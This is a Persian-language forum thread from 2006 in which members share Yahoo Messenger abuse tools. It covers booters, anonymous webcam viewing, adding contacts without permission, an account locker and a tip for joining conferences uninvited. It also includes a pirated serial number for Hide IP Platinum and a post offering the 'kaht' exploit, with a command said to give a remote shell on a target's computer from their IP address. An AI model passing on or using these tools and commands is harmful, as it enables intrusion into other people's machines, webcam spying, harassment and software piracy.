ضمن خسته نباشید به بچه های فعال در قسمت یا هو به خصوص آقا اشکان عزیز
یه سوال داشتم امید وارم بتونید کمک کنید
چه جوری می شه وارد کنفرانسی شد که دعوت نشدید ولی می دونید چه کاربر هایی داخل کنفرانس هستند ؟

*NashenaS*
18-04-2006, 01:42
ضمن خسته نباشید به بچه های فعال در قسمت یا هو به خصوص آقا اشکان عزیز
یه سوال داشتم امید وارم بتونید کمک کنید
چه جوری می شه وارد کنفرانسی شد که دعوت نشدید ولی می دونید چه کاربر هایی داخل کنفرانس هستند ؟
دوست من سلام...
ممنونم..
خدمت شما عرض كنم كه من تا اونجايي كه اطلاع دارم چنين چيزي امكان نداره يا اينكه من در جريان وجود چنين برنامه اي نيستم...
يه برنامه بود تا اونجايي كه من يادمه كه با اون مي تونستي با هر ايدي كه مي خاي به كنفرانس ها بري... اما يه خورده دردسر داشت چون كه بايد اسم كامل كنفرانس رو داشته بودي...
اگه پيداش كردم تو نرم افزارهام مي زارم ...
يا حق. :)

br0991
18-04-2006, 03:07
دوست من سلام...
ممنونم..
خدمت شما عرض كنم كه من تا اونجايي كه اطلاع دارم چنين چيزي امكان نداره يا اينكه من در جريان وجود چنين برنامه اي نيستم...
يه برنامه بود تا اونجايي كه من يادمه كه با اون مي تونستي با هر ايدي كه مي خاي به كنفرانس ها بري... اما يه خورده دردسر داشت چون كه بايد اسم كامل كنفرانس رو داشته بودي...
اگه پيداش كردم تو نرم افزارهام مي زارم ...
يا حق. :)
اشکان جان این برنامه ای که تو میگی من دارم اگه خواستی بگو بهت بدم این هم آیدی من در یا هو مسنجر once.4ever@yahoo.com
بابت قضیه کنفرا نس هم اگه چیزی گیرت اومد ، ممنون می شم خبر بدی

*NashenaS*
18-04-2006, 04:32
اشکان جان این برنامه ای که تو میگی من دارم اگه خواستی بگو بهت بدم این هم آیدی من در یا هو مسنجر once.4ever@yahoo.com
بابت قضیه کنفرا نس هم اگه چیزی گیرت اومد ، ممنون می شم خبر بدی
ممنونم عزيزم...
من برنامه رو دارم فقط بايد بگردم ببينم كجاست... شما هم كه داري پس غمي نيست... اون برنامه هم واسه كنفرانس پيدا كردم چشم مي زارم..

خوب حالا به برنامه جديد:
Y! Intai 2.6

این نرم افزار دارای قابلیت های فراوانی از قبیل :

- چک کردن وضعیت افراد در یاهو مسنجر ( Offline OR Online )
- - Add کردن بدون اجازه
- مشاهده وبکم دیگران به صورت Anonymous
- بوت کردن
- ...
را داراست...

Hamid110
18-04-2006, 15:15
ممنونم عزيزم...
من برنامه رو دارم فقط بايد بگردم ببينم كجاست... شما هم كه داري پس غمي نيست... اون برنامه هم واسه كنفرانس پيدا كردم چشم مي زارم..

خوب حالا به برنامه جديد:
Y! Intai 2.6

این نرم افزار دارای قابلیت های فراوانی از قبیل :

- چک کردن وضعیت افراد در یاهو مسنجر ( Offline OR Online )
- - Add کردن بدون اجازه
- مشاهده وبکم دیگران به صورت Anonymous
- بوت کردن
- ...
را داراست...

سلام

ممنون اشكان جان

دوستان من قبلا با اين برنامه كار كردم

خيلي خوبه

راحت ميشه وبكم ديد

حتما دانلود كنيد

ممنون از شما

خدانگهدار :blush:

*NashenaS*
18-04-2006, 16:59
خیلی ها دنبال این هستن که چطور میشه برای آیدی Nick Name های خفن گذاشت .

به عنوان مثال آیدی شما در روم به این صورت میشه --->

█ ▀ ▄ ▲ ♀ ♂ ♦ ♠ ♣ ♥ و ...

این مطلب رو بخونید حتمآ یاد میگیرید ...

خوب . برای اینکه بتونید تو نیک نیم آیدی یونیکد بزارین باید آیدی رو تو سرور تایوان بسازید ...

وقتی روی این لینک کلیک کردین صفحه رجیستر یاهو باز میشه که باید از Preferred content تایوان رو انتخواب کنید .
يه پيغام مياد براي شما كه شما در جواب بايد وقتی این پیغام رو دیدید باید یک سی دی ویندوز اکس پی بزارید داخل سی دی رام و کلید اینستال رو بزنید و

منتظر بمونید تا فونت تایوانی روی کامپیوترتون نصب بشه ..
نکته : کسانی که از بوتر استفاده میکنن باید بعد از این که کارشون تموم شد فونت تایوانی رو پاک کنن تا بتونن دوباره از بوتر استفاده کنن .

خوب حالا فونت نصب شد . حالا اگه شما تا اینجا همه ی کار ها رو درست انجام داده باشید یه آیدی با سرور تایوان دارید .

امیدوارم بدونید که چطوری میشه برای آیدی نیک نیم گذاشت ...

اگه بلد نیستین . وارد یه روم بشین بعد از طریق منوی Change My Nichname <~~ Chat رو کلیک کنید و

وارد قسمت تغییر نیک نیم بشین . بعد هر نیک نیمی که میخواهید بزارید و کلید Save Changes رو بزنید .

نکته ۱ : نیک نیم شما نباید زیاد از حد طولانی باشه ...

نکته ۲ : برای نیک نیم آیدی های سرور تایوان شما فقط میتوانید از تعداد خاصی یونیکد استفاده کنید ...

برای دسترسی به لیست کامل یونیکد ها میتوانید از کاراکتر مپ ویندوز استفاده کنید ...

Start Menu ~~> Programs ~~> Accessories ~~> System Tools ~~> Character Map

برخی از یونیکد هایی که برای نیک نیم آی دی های سرور تایوان قابل استفاده هستند : ...

█ ▀ ▄ ▲ ♀ ♂ ♦ ♠ ♣ ♥ و ...( اینم لینک ساخت آیدی در یاهو )
Link ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] qgbg31.hpWMN33OYZLNVlE6VJwAB_eXRmLdhMHAQVRmJboci7e GMblHIU40ZtmmtQHkWDYqdjfuWVwMdzWl1NfB_.KKrAvLNNBmj YQngsIsZDGUKKpfPxWk6PlhncI6FPsfApW0cfu0a0YKS9Tqfnr tv8ikI724hd_zH0Hkr2YLChM3gMrkGHn0woflufemx0CgGe4F7 Lrf1JkAl1y5IuSkXMGt4DoGYqiBoi4fI82m5QjCQD4UnX7.slb ThkacQympTGgN7C8d1mKYMF8mx9556.hPA6iYi8qGp0ksQ3lCZ oB1CufHYJS6MjNMZRww64h9IjkfitrSTGd8jSM_X3iyd6q8F5N HG65hf6A_RjzXIxqE5fIPKTYK1jrfhbM.FGh1FCcbvBWAuDroI 9lBYBlo3_ILE8xgVWGdXxoFzv1bvOkttkMxVyq1rby_iWvoYuw TU8icPto0iUTq01scIsU7x7K_dDmhmeRnyPLrzHWLvp4NvtYq2 6d._5g--)

*NashenaS*
18-04-2006, 17:42
این هم از آخرین ورژن Hide IP Platinum

قابلیت های این برنامه

از جمله

۱. مانع از هک شدن.

۲. نا شناس نمودن ما در اینترنت و....

حال به آموزش این برنامه می پردازیم.

. با تایید این گزینه با زدن کلیک چپ موس روی نشانگر برنامه در کنار ساعت ویندوز آی پی شما عوض می شود1- .

۲. با استفاده از این کلید میانبر برنامه خاموش و روشن می شود.

۳. با استفاده از این کلید میانبر آی پی خود را تغییر می دهیم.

۴. با استفاده از این کلید میانبر آی پی خود را میتوان مشاهده کرد.

در این تصویر که مشاهده می نمایید آی پی خود من مانند آی پی های سایت شده و دارای پورت 8080 می باشد.

چند نکته این برنامه

۱. این برنامه برای مخفی نمودن آی پی ما در برابر سایتها قفط بر روی این 3 نوع مرور گر کار می کند.

Internet Explorer.۱

Firefox .۲

۳. Opera

سیستم مورد نیاز

Windows 98/2000/XP/2003/Me

32 Megabyte Memory

200 MHz CPU

این هم سریال مورد نیاز برنامه :

S/N: 2BA1056B1A10559F

من رو هم دعا كنين... :)

omid.com
18-04-2006, 21:37
با سلام خدمت دوستان اینم یه بوتر به اسم ایکس بومب با مشخصات ذیل
مولتی لوکین(البته من بیشتر از 300تا برام آن نشد
2.دارای 14 آ÷شن بوت
3.دارای آ÷شنی جهت نشان دادن آی ÷ی و ÷ی سی نیم
4. آکانت لوکر

و یکسری امکانات دیگر نظیر کول شیت
Download

اشکان جان عکسشم داشتم ولی نمیدونم چطوری بزارم اینجا لطف کن در این مورد راهنمایی کن

این تاپیک ادامه تاپیک زیر میابشد ....:
بدلیل زیاد شدن برنامه های معرفی شده تصمیم گرفتم که به برای راحتی دوستان در جستجو تاپیک ها رو به دو قسمت تقسیم کنم ....

*NashenaS*
18-04-2006, 21:43
با سلام خدمت دوستان اینم یه بوتر با مشخصات ذیل:
1.مولتی لوکین(البته من بیشتر از 300تا برام آن نشد
2.دارای 14 آ÷شن بوت
3.دارای آ÷شنی جهت نشان دادن آی ÷ی و ÷ی سی نیم
4. آکانت لوکر

و یکسری امکانات دیگر نظیر کول شیت
Download

اشکان جان عکسشم داشتم ولی نمیدونم چطوری بزارم اینجا لطف کن در این مورد راهنمایی کن
اميد عزيزم سلام...
ممنون از بوترت...
گزشتن عكس رو بارها در انجمن توضيح دادم ... دوباره مي گم...
شما عكس خودتون رو اول در يكي از سايت هاي

اپلود مي كني و بعد در اون سايت يه سري لينك به شما داده مي شه...
شما مي توني هر كدوم از اون لينك ها رو برداري و اينجا توي فروم كپي و پيست كني اما اگه مي خاي عكست مثل عكسي كه من مي زارم باشه... بايد اخرين لينكي كه در اون سايت به شما داده مي شه رو direct link رو كپي كني و اينجا در قسمتي كه IMG مي توني بزاري پيست كني...
راحته... مشكلي داشتي بگو... :)

م.پ.د
18-04-2006, 23:18
AshKaN جان چطوري برنامه Hide IP Platinum را از Megaupload دانلود كنم؟؟؟ :sad:

morteza_k
18-04-2006, 23:27
این هم از آخرین ورژن Hide IP Platinum

قابلیت های این برنامه

از جمله

۱. مانع از هک شدن.

۲. نا شناس نمودن ما در اینترنت و....

حال به آموزش این برنامه می پردازیم.

. با تایید این گزینه با زدن کلیک چپ موس روی نشانگر برنامه در کنار ساعت ویندوز آی پی شما عوض می شود1- .

۲. با استفاده از این کلید میانبر برنامه خاموش و روشن می شود.

۳. با استفاده از این کلید میانبر آی پی خود را تغییر می دهیم.

۴. با استفاده از این کلید میانبر آی پی خود را میتوان مشاهده کرد.

در این تصویر که مشاهده می نمایید آی پی خود من مانند آی پی های سایت شده و دارای پورت 8080 می باشد.

چند نکته این برنامه

۱. این برنامه برای مخفی نمودن آی پی ما در برابر سایتها قفط بر روی این 3 نوع مرور گر کار می کند.

Internet Explorer.۱

Firefox .۲

۳. Opera

سیستم مورد نیاز

Windows 98/2000/XP/2003/Me

32 Megabyte Memory

200 MHz CPU

این هم سریال مورد نیاز برنامه :

S/N: 2BA1056B1A10559F

من رو هم دعا كنين... :)

سلام دوست خوبم
شرمنده اقا لینک برای من کار نمی کنه .
لطفا یک نگاهی بهش بندازین.
ممنونم. :rolleye:

Wisdom
19-04-2006, 01:17
لينك سالم هستش !

*NashenaS*
19-04-2006, 01:34
AshKaN جان چطوري برنامه Hide IP Platinum را از Megaupload دانلود كنم؟؟؟ :sad:

سلام دوست خوبم
شرمنده اقا لینک برای من کار نمی کنه .
لطفا یک نگاهی بهش بندازین

لينك رو تست كردم كار مي كنه.:
نحوه دانلود رو گزاشتم كه ببينين:

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

موفق باشين. :)

Hamid110
19-04-2006, 01:49
سلام آقا اشكان

لينك درسته . !

اما ----- شده

براي من هم نيومد

تنها چيزي كه بعد از (كليك دانلود) اومد اين بود : مشترك گرامي دسترسي شما به . ... .

ممنون

موفق باشيد

saeid_saeid
19-04-2006, 11:39
می گم بهتر نیست فایلا رو تو Persiangig آپلود کنید. اینجوری هم پاک نمیشه هم فیلتر نیست.:)

saeid_saeid
19-04-2006, 11:50
اینم یه اکسپلویته تمام ایار. فقط کافی IP طرف رو داشته باشی . میتونی خیلی راحت ازش Shell بگیری.

رو 90% موارد جواب میده.
طرز کارشم اینجوریه که اول باید بعد از داون لود فایل رو Extra کنید بعد از Start منو Run رو باز منید و CMD رو تایپ کنید. حالا به فولدری که این برنامه توش هست برید و این رو تایپ کنید

kaht YourIP ClintIP

که بجای YuorIP باید IP خودتونو بنویسید و به حای ClintIP هم IP طرف رو بنویسید. بعد Enter . سه صوت از کامپیوتر طرف به شما شل می ده.

piishii
19-04-2006, 11:50
اشکان جان سلام یک برنامه به داداشت معرفی میکنی که بتونه ایدیشو از لیست کسی پاک کنه مطمئن هم باشه که این کار انجام شده ؟
پیغام خصوصیتم چک کن عزیز .

*NashenaS*
19-04-2006, 11:59
می گم بهتر نیست فایلا رو تو Persiangig آپلود کنید. اینجوری هم پاک نمیشه هم فیلتر نیست.

ممنون از پيشنهادت اما من اونجا اكانت ندارم اگه مي خاين يه دعوتنامه بفرستين... من چيز ها رو اونجا اپلود مي كنم.

اشکان جان سلام یک برنامه به داداشت معرفی میکنی که بتونه ایدیشو از لیست کسی پاک کنه مطمئن هم باشه که این کار انجام شده ؟
پیغام خصوصیتم چک کن عزیز .
معلومه كه معرفي مي كنم ... اگه پست هاي قبلي رو يه نگاه بندازي فكر كنم يكي دو تا از اين ها گزاشته بودم اما بازم مي زارم.. چشم.
:tongue:

UN4given
19-04-2006, 14:42
سلام به همه

من اول از همه بخاطر تاپیک قشنگتون ممنونم یه سوال داشتم می خواستم بدونم این فایل های با پسوند Ocx قضیه اش چیه اینا همه این فایل ها رو می خوان

مرسی